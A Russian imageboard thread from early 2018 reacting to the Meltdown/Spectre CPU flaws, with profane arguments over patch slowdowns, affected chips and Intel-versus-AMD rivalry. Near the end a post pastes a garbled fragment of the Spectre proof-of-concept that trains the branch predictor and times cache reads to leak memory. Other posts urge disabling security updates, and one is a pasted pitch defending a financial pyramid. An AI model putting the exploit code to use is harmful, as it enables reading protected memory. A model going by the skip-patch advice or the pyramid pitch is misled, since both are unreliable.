Вкратце: у всех интелов выпущенных за 10 лет найдена аппаратная ошибка в проектировании, позволяющая ачкерам беспрепятственно залить тебе говна в жопу. Заплатка на уровне ос понижает производительность до 65%
>>2637448 Запустил новое ядро линукса с заплаткой, на бенчмарке 7z даже увеличилась произодительность только выйграли Может я просто что криво поставил, надо другие бенчи посмотреть.
Проигрываю с манек в этом треде, накупили говна, которое режут, пиздец просто. Теперь покукарекайте, что вы не обосрались, что говно вам в жопу залили, главное не забудте ещё бабулетов занести интолу с амудой.
>>2637405 (OP) Затронет ли хворь сия мою няшу? И вообще, где список зафакапленных процессоров? Все носятся и квохчут, как на пожаре в курятнике, а по существу инфы не ретранслируют
>>2637488 Проигрываю с тебя, это как если бы петрович на разъебанном совковом запорожце злорадствовал, что у новой ламбы хуево работает задняя передача.
>>2637437 >Однако радость поклонников «красных» оказалась преждевременной — разработчики, похоже, решили не учитывать защищенность архитектуры AMD от подобного типа атак и выпустить универсальные исправления KPTI для всех систем. По крайней мере, на это указывает исправленная версия ядра Linux под порядковым номером 4.15, которая считает, что AMD содержат уязвимость. На данный момент существует высокая вероятность, что разработчики ОС попросту проигнорируют иммунитет чипов AMD и не добавят их в исключение. Как результат, после выпуска исправлений KPTI с производительностью систем на процессорах AMD случится ровно то же самое, что и с машинами на чипах Intel. То есть, она существенно снизится.
>>2637448 Каково это осознавать что мой скайлейк даже при просадке на 30% дает пососать твоему говну мамонта. А как только выйдет проц без этого бага, я куплю себе новый комп, я же не нищеброд с ЛГА
>>2637508 https://www.youtube.com/watch?v=p81SpwEe7xM Только что дослушал шебмрилейтед. Молодой человек тоже упоминает i-серию "I think it's an entire "i"-series which is completely fucked" Но вот ограничивается ли жопа ею, пока непонятно
>>2637501 Ну писали уже в прошлом треде, что 100% уязвимы все профессоры за последние 10 лет, и возможно, уязвимы все процы с такой технологией обработки - а она появилась где-то рядом со вторым пнем.
>>2637522 > По крайней мере, на это указывает исправленная версия ядра Linux под порядковым номером 4.15, которая считает, что AMD содержат уязвимость. То есть с рязанью обновляться до 4.15 просто не имеет смысла?
Ну если бы уязвимость кем-то использовалась, то у моего шефа давно бы упёрли все пароли от кредиток. Сидит на i7 3770 уже 6 лет, из контакта не вылазит.
А что мешает просто не обновляться? Сидели же до этого и в хуй не дули, а на уязвимость информации мне похуй, пусть все знают про мою коллекцию порно с членодевками.
>>2637559 Такое хитрые интеложиды тоже предусмотрели. И если ты задумаешь их перехитрить, они заебошат новый ванакрай через эту дыру. А потом скажут НАДО БЫЛО ОБНОВЛЯТЬСЯ
>>2637556 Бля, какие же вы тупые. Детали уязвимости объявят в открытую (читай - развяжут руки какерам), когда майкрософт выкатят патч. Чтобы лошки ставили 10ку, чтобы лошки покупали новые говнопроцы. У твоего шефа не увели пароли, потому что никто не знал про эту дыру в защите. Через месяц все выяснятся все механизмы работы этой уязвимости, и, если твой шеф не пошевелится на эту тему, то его паролям пиздец.
> Разработчики PostgreSQL отметили падение производительности в тесте pgbench на 23% (при использовании процессоров с PCID - 17%). > с PCID - 17% А это у каких PCID?
>>2637559 >А что мешает просто не обновляться? То что после того как выкатят патчи то уязвимость обнародуют. Это значит что любой петя из 8Б будет знать в чем она заключается и сможет написать вирус, который ебет непропатченые процы. забыл уже как год назад вирус петя на кукане провернул кучу компов? Можем повторить
Минутка паранойи: 1. Месяц назад СЕО интела слил свои акции. 2. Уязвимости около 10 лет, то есть уязвимость идет примерно с того же времени, когда появился Intel ME. Совпадения? Не думаю.
>>2637578 >чтобы лошки покупали новые говнопроцы Даун, Интел сотрудничает с ЦРУ и далет в процах закладки, через которые обама может набить морду по ip и спиздить любую инфу и подключенного к интернету компа. Там такое бабло отваливают, что твои копейки Интелу нахуй не всрались. Но спустя много лет кто-то доковырялся до этой свистоперделки и вскрыл тему. Теперь Интелу придется клепать новые процы с более хитро спрятанной дыркой.
Давайте рассуждать логически. Облачные провайдеры подорвались патчить с небывалой быстротой, даже сервера готовы отключить временно. В то же время, в ядре хостовых систем у них вряд ли какая-то серьезная инфа, они просто обеспечивают работу виртуалок. Даже если там ключи от full disk encryption хоста, без физического доступа к датацентру они бесполезны. Судя по инфе, способ извлечения инфы трудоемкий и сложный, поэтому ты заебешься выкачивать дамп всей памяти, а точечно ты хуй получишь какой-то профит от зашифрованной и рандомизированной памяти соседней виртуалки. Вероятно, такой кипеш из-за того, что там все же есть jailbreak, выполнение произвольного кода на хосте, а не просто утечка инфы с хоста.
>>2637622 Продолжаю убеждать себя, что всё будет хорошо, уязвимость пофиксят и производительность не пострадает. Блять, у меня реально ОТРИЦАНИЕ, никак не укладывается что такой пиздец может на самом деле произойти.
>>2637653 Долбоеб, это предыдущая уязвимость. Вообще, бохатый выдался год на обосрамсы Intel. В мае AMT, в июле ME, в октябре BootGuard, в ноябре NUC, в декабре эта хуйня. Пиздец.
>>2637637 > а точечно ты хуй получишь какой-то профит от зашифрованной и рандомизированной памяти соседней виртуалки ну с heartbleed же получали профиты, и очень много а тут все даже хуже
>>2637656 >Как это всё коснётся игродаунов Никак практически. Коснется серверов, майнеров, ну и любителей ПОКОНПИЛИТЬ\ПОРЕНДЕРИТЬ А, ну и даунов, котоыре хуями в бенчмарках меряются.
>>2637637 Такой кипишь потому что потенциально могут быть задеты данные пользователей, или конкурирующей компанией может быть сделана атака с целью дискредитации, и все это приведет к потере репутации и серьезным финансовым потерям. Потому и суетятся чтобы закрыть как есть, а потом уже думать насколько серьезно.
>>2637662 >НИКАК, игорям похуй вообще. Всякие СУБД жестко соснут а если одновременно с игорем торрент качать или стримить, то все? похоже интол стал однозадачным процом
>>2637672 > серверов Смотря что на этих серверах крутится, базы данных - соснут. > ПОКОНПИЛИТЬ Если ты не собираешь софт 24/7, то не отразится > ПОРЕНДЕРИТЬ не заметят вообще
>>2637670 Емнип, heartbleed позволял невозбранно выкачать несколько сотен килобайт памяти за раз, а тут нужно ебаться с кэшами, буквально по несколько байт, и с жуткими тормозами всей системы при этом. Алсо, тут проблема именно в том, что нарушается принцип песочницы, ибо любую уязвимость, кроме таких вот низкоуровневых, можно изолировать, а тут только гроб гроб кладбище отдельный хост.
>>2637682 > пиздецки требовательны к процессорам Да, но на них это тоже не отразится. Дело в работе с памятью. На игры данный костыль никак не повлияет.
>>2637655 Я блять ксеон собрался покупать и в ус не дуть года 3. А тут тебе блять вместо 10к (ещё старый проц продал бы за 8к и в итоге затраты всего 2к) надо тратить 35к на рязань с памятью и мамкой. П И З Д А Р И К И
>>2637715 Я понимаю что вы господин можете себе позволить но ставить новый сокет при отсутствии мамок на рынке позволить себе не мог. Взял ходовой сокет чтобы если что перекатиться на что-нибудь другое тот же и7 может быть. Тем более приросты-то не особо сильные а новизна подымает цену. Не гонюсь за фпс и попугаями в бенчах. Для моих задач с 1050ти вполне сойдет. Не графодрочер.
>>2637730 > Last Reviewed: 26-Dec-2017 Article ID: 000025619
Intel® Management Engine (Intel® ME 6.x/7.x/8.x/9.x/10.x/11.x), Intel® Trusted Execution Engine (Intel® TXE 3.0), and Intel® Server Platform Services (Intel® SPS 4.0) vulnerability (Intel-SA-00086) А в итоге сосёшь ты, как обычно
CONFIG_PAGE_TABLE_ISOLATION: @ This feature reduces the number of hardware side channels by ensuring that the majority of kernel addresses are not mapped into userspace. @ See Documentation/x86/pagetable-isolation.txt for more details. @ cat: Documentation/x86/pagetable-isolation.txt: No such file or directory
>>2637737 >Пока патч не вышел. Половина людей сидит на винхп, на семёрке с отключёнными обновлениями или на десятке с вырванным утилиткой с корнем центром обновления. В итоге, всем похуй, что такое вирус, смутно вспоминается из середины 2000-х. Уже даже вредоносные сайты блочатся браузерами, какая уж тут вероятность попадания на комп ультра-технологичного зловреда.
Кто за 8400 топил, посмотрите разницу в мощах процов Ее нет Если нет разницы, зачем платить больше за мамку? Сортировка по цене по возрастанию.150 плат на 1151 и 30 на 1151v2. Так что обоссу пожалуй на новинкодрочера. У меня все.
>>2637784 >6/6 vs 4/4 на похожих частотах >разницы в мощах нет Лол, вот это мантры долбоёба. Твоё некроговно сейчас конкурирует разве что с ш3 8100 (и сосёт у ш3 8350к). А мамки дешёвые подвезут уже через месяц
>>2637784 > Если нет разницы, зачем платить больше за мамку? Хозяин выкатит новую уязвимость и холопы всё оплатят. Сам сижу на кваде и охуеваю, как я ещё не въебался в эту хуйню с 1150,1155 (и самым главным наебаловом в виде 1156). Нихуя же прироста нет в итоге для повседневных задач.
>>2637799 Да нахуй нужны эти дешевые мамки, берешь 370 и 2133 память и гонишь хотя бы до 2800 (ибо основной прирост от частоты оперативы, но вангую малолетние долбоебы будут сидеть на 2133).
>>2637798 Ну я то не школотрон мамка деньги на йобу пека не дала, а брать топ из топа будет только долбоеб школьник. Звук не нужен а как ты играть-то будешь.
>>2637807 Пиздец ты даун. Тебе черным по белом написали что уже вышел патч для линукса который не обращает внимания какой проц а просто всё патчит к хуям. Амд у тебя, или интел, или Эльбрус - всех нахуй, всем минус производительность
>>2637816 В чём прирост, дебиляндр? Вот покупка твердотельника реально дала прирост. Быстрее браузер загружается, фильмы интереснее стали, печатать стал быстрее?
>>2637799 Пф сколько не играю ни одна игра не загрузила проц под 100%. Игры не могут в многопоток маня. Посмотри на амудешников с 12-ю и что они йоба крутые исходя из твоей логики.
>>2637827 >Игры не могут в многопоток маня Ну раз ты скозал, лол. Кучу тестов на ютубе уже, где даже 8400 вполне загружается полностью. А дальше игры паралеллиться будут только лучше.
>>2637796 Смеху-то мало, амдебилы соснули сейчас, интел через какое-то время, а в итоге, все соснут. Пидорасы ебучие из интела, сжечь бы к хуям их штаб-квартиру, сука, а совет директоров по столбам развешать.
>>2637846 Ну типа того, придумали конвейерную сборку, начался кризис перепроизводства, нужно было кому-то толкать говнище. Это уже потом после войны додумались до запланированного устаревания, чтобы пипл каждые несколько лет покупал одно и тоже. Вот с квадами и ксеонами они конечно наебались, сейчас пытются пользователей наебать с помощью дристнятки, но народ не повёлся и эти мрази выкатили уязвимость о которой знали 8 лет.
>>2637865 Микрософт сказали, что выкатят патч во вторник, так что через неделю на винде будет такая же ситуация с отсосом красножопых. Какой же ты тупой блять
>>2637870 >нужно было кому-то толкать говнище То есть Гитлер просто хотел продавать свое говно? Как интересно, так а хули ж он не продавал а в батлфилд решил покатать?
>>2637879 Да мне похуй. Хоть 36 потоков и у тебя дома самолетная турбина на охлаждении (по громкости). Для капчевая в двачах и рабочих задач, лично мне хватит. Не работал еще с виртуалками Посмотрел бы там нагрузку.А проц в 100% зоне можно трактовать по разному.
По данным Intel, найденные уязвимости представляют опасность для:
6, 7 и 8 поколений процессоров Intel® Core™; процессоров Intel® Xeon® E3-1200 v5 и v6; процессоров Intel® Xeon® линейки Scalable; процессоров Intel® Xeon® линейки W; процессоров Intel® Atom® линейки C3000; процессоров Apollo Lake Intel® Atom серии E3900; Apollo Lake Intel® Pentium™; процессоров Celeron™ серий N и J.
>>2637847 Ну либо проц ждет информацию для обсчета которую с ЖД закидывается, либо памяти мало и идет перераспределение данных. Дохуя что может задерживать работу проца.
Ну и хули делать то? В октябре продал гиперпень, докинул денег и купил 7700 без разгона, думал, что забуду про проц лет на 5, буду менять только видюхи.
>>2637933 > 6, 7 и 8 поколений процессоров Intel® Core™ Я сменил 4770к на 7700к у меня поучилось примерно 30% буста. Теперь все в зад? Вы там охуели или что?
>Nvidia uses cpu scheduling for draw calls, and this relies on kernel level access. Nvidia cards are likely going to get nerfed when the intel patch rolls out.
АХАХАХАХАХАХАХАХАХАХАХАХААХАХАХАХАХАХА!!!!! Не только процы просядут но и видяхи. СОСНУЛИ ВСЕ БЛЯДЬ! Добро пожаловать в 2007, снова. поскольку ваши пекарни сейчас будут на уровне производительности 10летней давности. Можно снова portal перепройти например
Бля шиндоус уже год не обновлял, эт чо получается нужно обновиться, чтобы кулхацкеры не удалили мои паки с трапами или можно хуй забить и ждать пока рязань приедет?
>>2637889 Я не говорил за поточность я тебе говорил про то что разные поколения и из-за разницы в 2 ядра основательно тратиться на мамку на Z-чипсете под новый сокет выброс денег на ветер. Может этот сокет не взлетит.
>>2638028 смищьно да. а то что в /s/ летом людям компы херило шифровальщиком, атк это ЦРУ специально особо ценных петардов-двачевателей через спутник нашло, а совсем не тупой атакой по всем айпишникам подряд
>>2638056 Проигрываю с этих гоев >интел богоподомен, все баги на нем хуйня, а вот райзен хуйня с кучей багов >вылезает огромный баг >ой ну и что, через пару лет у вас точно так же баги посыпятся
>/ Assume for now that ALL x86 CPUs are insecure / >- setup_force_cpu_bug(X86_BUG_CPU_INSECURE); >+ if (c->x86_vendor != X86_VENDOR_AMD) >+ setup_force_cpu_bug(X86_BUG_CPU_INSECURE);
>>2638082 Да. > На следующий день недовольные пользователи начали подавать на Apple в суд. Иски подали пользователи из штатов Иллинойс, Огайо, Индиана и Южная Каролина, а также жители Техаса и Калифорнии. Еще один иск подали французские активисты из группы «Остановить запланированное устаревание» — во Франции с 2015 года запрещено намеренно ухудшать свойства продуктов с течением времени. В одном из исков, поданных в Калифорнии, требовали заставить Apple выплатить пользователям 999 миллиардов долларов.
>>2638076 За 10 лет сколько процессорочасов у штеуда там накопилось? Сотни миллиардов, триллионы или более? И заметили только за такой огромный срок, в то же время а амуды 1.5% серверного рынка и 18% потребительского, баги толком никто и не искал - работает и ладно. При этом, фикс выпустили еще до того как кто-то пострадал от него, и сейчас оперативно ищут решения для сохранения производительности там где она упала. А разейн? Ну как работает, нужно пердолиться и четко подбирать комплектующие, чтобы после трех комплектов рам и 15 разных бивасов попиздовать на двощ и везде кудахтать о том как хорошо работает. Пол года фиксили корявую работу, пока утята ныли о несовместимости, неработоспособности и проблемах с разгона, и каждый месяц "тесты не тесты, ты в этом месяце потести, тут посос чуть менее интенсивный".
>>2637823 >Тебе черным по белом написали что уже вышел патч для линукса который не обращает внимания какой проц а просто всё патчит к хуям. А почему? Потому что зарплату Пинус Фаундэйшн и лично Пинусу платит Интел. Естественно, хуй они примут в мейнлайн патч, настолько сильно проводящий по губам Интелю, им лучше, чтобы соснули все. ПЕРДОЛЕШВАБОДКА, бггг.
По АМД уже специалисты проехались, что они однозначно заявляют, что их процессоры не подверженны атаке. Потому что это позволит легче найти ошибку и нарушит общее эмбарго.
> http://www.opennet.ru/opennews/art.shtml?num=47849 > Дополнение 2: Исследователь по безопасности под псевдонимом Brainsmoke написал прототип эксплоита, который читает закрытую память ядра при запуске непривилегированного процесса. Судя по всему, ошибка даже более серьёзная, чем предполагалось ранее. ПОЧАЛОСЯ
Годный рекламный ход от АМУДЕ. Сейчас хуесосы побегут в магазин скупать все партии АМУДЕ а потом когда озолотятся на хомячках скажут что в АМД встроенный БОТНЕТ с 2009. Кароч проиграл в голосину.
>>2638164 >потом когда озолотятся на хомячках скажут что в АМД встроенный БОТНЕТ с 2009 После этого все побегут покупать новые Штеуд Core с встроенной графикой Radeon - там сразу будут и уязвимости Штеуда, и ботнет амуды.
>>2638185 А вот это пиздец как неточно. Как весь ARM64 может соснуть, его же производят ебовое количество вендоров. Больше похоже на пиздёж Интела во избежание хуй86-капца.
>>2638196 Причём сейчас по-сути ещё ничего не происходит. Не вышли патчи, не написаны вирусы, никто не подал в суд, обладатели датацентров не начали охуевать и т.п.
>>2638209 Можно на месте свиней из интел просто не сливать тех. подробности дыры в защите даже после выхода патча. В чем смысл? Это даже выглядит, как беззастенчивое "Надевайте наш бронежилет, в котором вы не сможете ходить и бегать, потому что мы сейчас даем пистолет в руки гопнику, хихих".
>>2638209 Сегодня в маршрутке девчушка лет 4-х спросила маму: «А если всем попросить Бога, он пофиксит эксплоит в интеловских процах? С мамой плакала половина маршрутки
>>2637949 Ебанько, во-первых это патч под линукс, во-вторых отключается в одну строку при загрузке либо включается только для интела правкой опять же одной строки в исходниках. И вообще под виндой у каждого вендора свои драйверы, поэтому хуй соси
>>2638157 Касперски ещё в 2009 нашёл подобный эксплоит в интеловских процах. Тогда он не опубликовал его, а дал интелу время на затыкание дыры. А сейчас обосрамс уже покрупнее - его просто так не заткнёшь.
Два чаю братишка, после этой новости захотелось водрузить 478-й нортвуд с гипертредингом, на P4P800, и 4 гб, и вообще поставить линупс или серверную винду с PAE... и еще 6600GT туда...
Все эти годы не оставляло ощущение что к этому железу еще придётся вернуться, и предчувствие меня не обмануло.
Там забугорные кулцкакеры пишут что 17-35 довольно скромно. Типа в некоторых задачах до 70% палеиня производительности, томушо пришлось разделить какуюто-хуйню и кароч чет там такое, не ебу ваще. Ну и написали тчо дыра пиздецовая, не латать не вариант ваще, ибо хуй пизда малафья и членмогут в жепу подкинуть. Такие дела блять!
Теперь все начинают повторять моду на замедление процессоров, вслед за Apple. Что дальше? Уязвимость в видеокартах, из-за которой придётся снизить производительность в 2 раза?
>>2638404 Ну ты падажжи ёбана! Не шарю я. ВОт в далёком 2013 взял себе 2500к gtx680 и мамку на p67 и рад. А ща полез смотреть прайсы, че-как. И блять охуел. Милион каких-то версий навысирали, мамок к ним еще блять больше. Память с гребешками и встроеной гирляндой, РОТ ЕБАЛ Как из всего этого говна выбрать то что нужно, хуй знает. Не хочется переплачивать за свистоперделки уровня пистолетика в виде радиатора на мосту, но и взять откровенно говно тоже не хочется.
>>2638404 Ну а чего тебе пояснить. Патч принудительно разносит память процессора и пользовательскую память. Если приложение живет только в пользовательской памяти - провалы в производительности отсутствуют. А если много системных вызовов к процессору напрямую - то из-за переключения контекста появляются задержки.
>>2637405 (OP) Как показывает практика любое помешательство отдельного человека и всего его окружения гасится максимум за две недели. Конечно, при первом подозрении, что что-то пошло не так, первое желание рефлексивно-эмоциональное – это забрать свои деньги и пусть делают что хотят ТОЛЬКО БЕЗ МЕНЯ. Но есть одно «НО», система создана людьми и для людей и импульсивные решения небольшого количества и последующая за ними цепная реакция просто не имеют права разрушать ее! Финансовая пирамида, как и любая другая пирамида держится на вере и на поведении участников, каждый трезво мыслящий индивид понимает, что в случае паники денег всем не хватит и все просто рухнет! И все придется начинать заново… А нам это надо? НЕТ, нет и нет! Для чего нам с Вами убивать курицу, которая несет золотые яйца??? Это по меньшей мере глупо. Поэтому то правила и предусматривают в случае паники — включение режима «спокойствие». В стрессовой ситуации мы забываем про курицу и ее золотые яйца и судорожно пытаемся спасти то что есть, не думая о будущем, тем самым убивая не только свое будущее, а также многих и многих других участников системы. К примеру, представьте ситуацию, что по Первому каналу объявили, что Сбербанк – это мошенническая организация, как вы думаете, сможет он всем своим вкладчикам в один день вернуть все вклады??? Нет! И страховая не сможет вернуть все взносы по страхованию, и пенсионный фонд не сможет вернуть, потому что часть уже выплачена пенсионерам и только после того, как новая молодежь принесет деньги, они смогут опять платить пенсионерам . Это замкнутый круг. И мы создаем такой же замкнутый круг, только сами без кормления олигархов, без постройки шикарных зданий и содержания армии работников. В любой пирамиде критична не сумма долга, а поведение участников, это должны понимать все и каждый! Только вместе МЫ МОЖЕМ МНОГОЕ! А по отдельности мы уже жили всю свою предыдущую жизнь. Кому то кстати удавалось вполне неплохо ее устраивать, этих кого-то процентов пять от общего числа людей на планете и именно им принадлежит 95% всех мировых денег. Несправедливо? Да! Жизнь вообще несправедливая штука. Тем не менее иногда она подкидывает варианты, но слепые их не видят, глухие о них не слышат, тем не менее все остальные используют! И многие вполне успешно!
>>2638432 Блядь, у меня одногруппник обожает такое пафосное школоговно. Светящиеся, как елка корпуса, чирипы всякие, кислотные цвета. Вроде 22 года человеку.
>>2638484 > Его еще пилить и пилить. Что там пилить то? 3700 строк кода всего. Работает отлично, на древнем роутере дает полноценные 100 мегабит. А опенвпн еле 20 выдавал.
В openwrt и debian sid уже готовые пакеты положили.
>>2638462 Смотреть надо не в бенчах, а в самих играх, да и не понятно - внедрили ли уже мелкософтовские патч в инсайдерскую сборку или нет (это про тест computerbase), а тесты phoronix не слишком показательны, -карта Вега + неясные настройки. Их тесты больше на тест видеокарты похожи.
>>2638489 >WireGuard is not yet complete. You should not rely on this code. К тому же без гуевых клиентов под винду и мак разговаривать вообще не о чем. Уж не говоря о энтерпрайзных решениях вроде Pritunl.
>>2638503 С чего ты решил, что игры не лезут в сисколл? Да, по идее, их должны делать, ограничивая вызовы, но сейчас бал правят индусы и даже индюшатина с 3 полигонами ногебает 1080ti с нихуя.
>это не мы обосрались, просто говно в штанах появилось. И теперь с АМД, АРМ мы будем решать эту проблему, чтобы говно не появилялось больше в штанах у кого-либо из нас.
>>2638550 Пишут, что те эксплойты нихуя не опасны и не могут вызвать облегчение доступа к конфиденциальным данным, мамай клинус, но вы типа все равно ставьте патчи, хихи, они вам порежут производительность, но не сильно. Пидорги поганые.
Последние сообщения о том, что эти эксплойты вызваны “ошибкой” или “недостатком” и уникальны для продуктов Intel, неверны. На основе анализа, проведенного на сегодняшний день, многие типы вычислительных устройств — с процессорами и операционными системами различных производителей — подвержены этим эксплойтам.
>>2638586 > На основе анализа, проведенного на сегодняшний день, многие типы вычислительных устройств — с процессорами и операционными системами различных производителей — подвержены этим эксплойтам. песец как будто Путина послушал
>>2638578 Они пишут, что нельзя модифицировать или повредить данные, как и было предсказано, ибо там читаешь недоступную память из кэша невыполненной ветки конвейера, а при записи кэши сбрасываются. А читать можно, и это будут фиксить, причем со временем смогут вместо этого костыля реализовать хранение ключей в TXT или типа того, и тогда хакору не будет толку от чтения. Обосрались тут все, конечно, но так или иначе это by design, и ебаться придется софтварным разработчикам.
С течением времени у сковородок протирается ручка и однажды она может сломаться и упасть горячая вам на ногу. Что бы этого не происходило мы сделали так, что в течении года плита прожжет в вашей сковородке дыру и вам пришлось купить новую. Таким образом ручки в ваших сковородках будут всегда целы.
>>2638602 Купите вместо сковородки вафельницу. Она показывает прирост производительности до 200% при производстве вафель при использовании электроплиты нового поколения от того же производителя, кроме того у нее отсутствует ручка!
Собственно интел в своем пресс релизе и написал то, о чем я уже второй тред толкую здешним даунам - эксплоит рид-онли, он не может модифицировать память. Значит МАКСИМУМ чем вы рискуете - что у вас утянут конфеденциальную инфу, т.е. никаких майнеров, малварей итд. Ставить патч чтобы задушить свой процессор, обезопашиваясь от этого - дебилизм.
>>2638616 Щас набегут кексперты которые тебе расскажут про кулцкакиров, котоыре у тебя будут пиздить пароли от порнхаба и паскод от макабы. которые не слышали про двухэтапную аутентификацию
>>2638624 >не оперировать на компе инфой, которая в случае ее утечки может нанести тебе ущерб и как это сделать это же комп, а не сраная игровая консоль
>>2638630 >И что ты боишься потерять? Пароль от почты или форума? В стиме двухфакторная, на почту тоже поставь. и? код то ты куда вводить будешь мудила разве не в тот же комп
>>2638653 >В редакции ComputerBase последняя используемая тестовая система процессора снова использовалась после праздников с Intel Core i7-7700K. На втором SSD были загружены те же тесты, но не было установлено обновление для Windows 10 Case Creators Update , но последний Insider Preview Build 17063 от 19 декабря 2017 года, в котором патч уже активен . Выбранные критерии не зависят от производительности SSD. >https://twitter.com/aionescu/status/948427734845239298 Пошел нахуй.
ананасики, у еот на новом буке со вчерашнего дня начали отваливаться дрова(wifi, видео), на буке стоит вин 10 oem. Какова вероятность того что мелкософт начал тестировать патчи на oem опущенцах?
>>2638668 >интел могли хоть 10 лет назад microsoft об этом баге рассказать Нет, интел сам узнал об этом только сейчас, т.к. иначе они бы пофиксили уязвимость в какой-то момент.
>>2638673 Есть вероятность что винда просто ставит свои дрова на вафлю и видео, просто потому что у них цифра больше. Я так заебался бороться, что сменил wifi модуль
>>2638679 10 лет я сказал ради примера. Они могли знать несколько месяцев об этом, но ничего не смогли сделать, т.к процы уже были спроектированы и производились и поменять уже не получилось бы.
>>2638725 А ты думаешь, что если бы они в сентябре или в августе узнали, то успели бы исправить? Процессоры проектируются очень долго. Плюс уязвимость идёт начинаю с четвертого пня и ее возможно сложно пофиксить без полного редизайна проца
Кто готов пожертвовать свободой ради безопасности не достоин ни того, ни другого. Слышали такое выражение? Получать гарантированное урезание мощности cpu, в ряде задач колоссальное, чтобы избежать шанса (который стремится к нулю, если ты не даун), что тебя ХАКНУТ и утащат инфу на которую всем и так насрать, хмм вот это выбор. Ах да, у куколдов на десятке то и нет выбора, за них решают индусы из Редмонда.
>>2638755 Ну значит ты хуесос тупорылый, это делается любой утилитой для кастомизации винды, которых овер дохуя. Можно ручками через реестр, если боишься сторонних прог.
А у меня пиратосемерка, которая типа активированная и не требует активации. чем мне чревато? Кэби у меня. Сижу на сайтик, играю в игоры, качаю торренты
>>2638760 А, ну костыли то на любого инвалида найдутся. Можно вообще на роутере сервер обновлений заблокироваться. Ну или не пользоваться oc для даунов, но тут уже нужен iq повыше 80.
>>2638764 Какие костыли? Если человек знает об этом обновлении, то вырубить автообнову он сможет. А тот, кто не знает даже на семёрке его получит и не заметит.
>>2638780 Зайди на фочан, там все знают об этом обновлении, но у них и в мыслях нет подумать, что кто-то на него не обновится по собственной воле, как же так, это ж БЕЗОПАСНОСТЬ. А иначе тебя хакнет пукин и ты не станешь президентом.
>>2638739 >Кто готов пожертвовать свободой ради безопасности Чё блять... Очнись шизоид, каким макаром возможность, например, вору влезть в твой кошель и прочитать номер карты и цвв - свобода?
>>2638841 А залупу тебе не полизать еще? Губу он раскатал. Может вместо твоей хуево спроектированной некроты еще и топчик подогнали бы и денег дали. Россияне такие жадные я охуеваю.
>>2638866 Быдлан и хамло, >Да директор интел на тебя нассыт на тебя со своего кабинета в штаб-квартире в Калифорнии Ну да, а прежде он тебя спросит, как и что >Так что мечтай маня ибо Пыня ссыт на тебя. Ага, главное чтобы ты не намок
>>2638876 Потому что уже целый день наблюдаю за такими протестующими и ржущими над интелом недоумками. Если надо они их могут отозвать. А так запилят фикс. Извините, возможно я был резок. Просто ошибаются все, даже амд со своим рязанями и меняющими бивисы как перчатки ибо или не гонится или тротлится.
>>2638833 Я за Intel, тащемта, ибо несмотря на всю хуйню это стандарт де-факто, и без ебли можно работать только с ним. Но нужно адекватно реагировать на угрозы, а не отрицать их. Наличие большого количества обосрамсов в этом году - бесспорный факт, причем хорошо мне известный, ибо я немного поучаствовал в их устранении у своего вендора.
>>2638727 Вместе с винтом. Вот придет к тебе товарищ майор, а ты нажмешь кнопку на флешке с ключом, и хуй он расшифрует. А теперь товарищ майор вставит говноскрипт в сайт госуслуг, или в Яндекс, или подменит у провайдера любую страницу, и потом придет к тебе уже с ключом.
>>2637533 >А как только выйдет проц без этого бага, я куплю себе новый комп, я же не нищеброд с ЛГА >как только выйдет проц без этого бага, я куплю себе новый комп
Хороший гой, годный гой, так держать! Но только не забудь вовремя менять процессор каждое поколение, ведь за год мы сливаем все аппаратные закладки на черном рынке и спермопаста успевает протухнуть, ты же не хочешь иметь только 35% производительности через год, ой вей!
>>2638886 Ну тупые, ведь нужно смеяться над Америкой и Европой, да? >возможно я был резок Да ты меня обосрал с ног до головы Знаешь, а ведь ты хуже чем они,
>В своём заявлении Microsoft подтвердила, что уязвимость существует и на процессорах от AMD и на ARM-чипах. AMD публично отрицает даже теоретическую возможность эксплуатации уязвимости в своих продуктах.
Мне только спросить. Получается, суперзащищённые ноутбуки с либребутом также всасывали через этот бэкдор? Не зря я держу изолированно от интернета ноут для работы. Другой вопрос. Есть ли подвижки в сторону обновления ядер почивших систем? Например XP.
>>2638979 Недоперевод от изнасилованных журналистов. Расслабся, всё будет там нормально. Да, есть вероятность что в быстром глобальном патче производительность снизится. Но в дальнейшем разумно исключить снижение для неуязвимых процессоров.
>>2638980 >суперзащищённые ноутбуки с либребутом Они нихуя не суперзащищенные, это спекуляция на истерии криптопараноиков. Там все равно закрытый микрокод, BIOS, прошивки дисков и сетевух, железо, часть драйверов и еще хуй знает что. И некрожелезо, которое тебе впаривают по двойной цене под предлогом ЗАЩИЩЕННОСТИ, но нихуя подобного там нет. Вообще нет даже полностью открытого решения сейчас, не говоря уже о полностью защищенном. Лучшее, что ты можешь сделать - это какой-нибудь DIY-ноутбук на ARM с открытыми исходниками и картами кристаллов, но даже в этом случае ты будешь защищен до первой уязвимости в ядре Linux.
/******* Analysis code ********/ #define CACHE_HIT_THRESHOLD (80) / assume cache hit if time <= threshold /
/ Report best guess in value[0] and runner-up in value[1] / void readMemoryByte(size_t malicious_x, uint8_t value[2], int score[2]) { static int results[256]; int tries, i, j, k, mix_i, junk = 0; size_t training_x, x; register uint64_t time1, time2; volatile uint8_t addr;
for (i = 0; i < 256; i++) results = 0; for (tries = 999; tries > 0; tries--) {
/ Flush array2[256(0..255)] from cache / for (i = 0; i < 256; i++) _mm_clflush(&array2[i 512]); / intrinsic for clflush instruction /
/ 30 loops: 5 training runs (x=training_x) per attack run (x=malicious_x) / training_x = tries % array1_size; for (j = 29; j >= 0; j--) { _mm_clflush(&array1_size); for (volatile int z = 0; z < 100; z++) {} / Delay (can also mfence) /
/ Bit twiddling to set x=training_x if j%6!=0 or malicious_x if j%6==0 / / Avoid jumps in case those tip off the branch predictor / x = ((j % 6) - 1) & ~0xFFFF; / Set x=FFF.FF0000 if j%6==0, else x=0 / x = (x | (x >> 16)); / Set x=-1 if j&6=0, else x=0 / x = training_x ^ (x & (malicious_x ^ training_x));
/ Call the victim! / victim_function(x); }
/ Time reads. Order is lightly mixed up to prevent stride prediction / for (i = 0; i < 256; i++) { mix_i = ((i 167) + 13) & 255; addr = &array2[mix_i 512]; time1 = __rdtscp(&junk); / READ TIMER / junk = addr; / MEMORY ACCESS TO TIME / time2 = __rdtscp(&junk) - time1; / READ TIMER & COMPUTE ELAPSED TIME / if (time2 <= CACHE_HIT_THRESHOLD && mix_i != array1[tries % array1_size]) results[mix_i]++; / cache hit - add +1 to score for this value / }
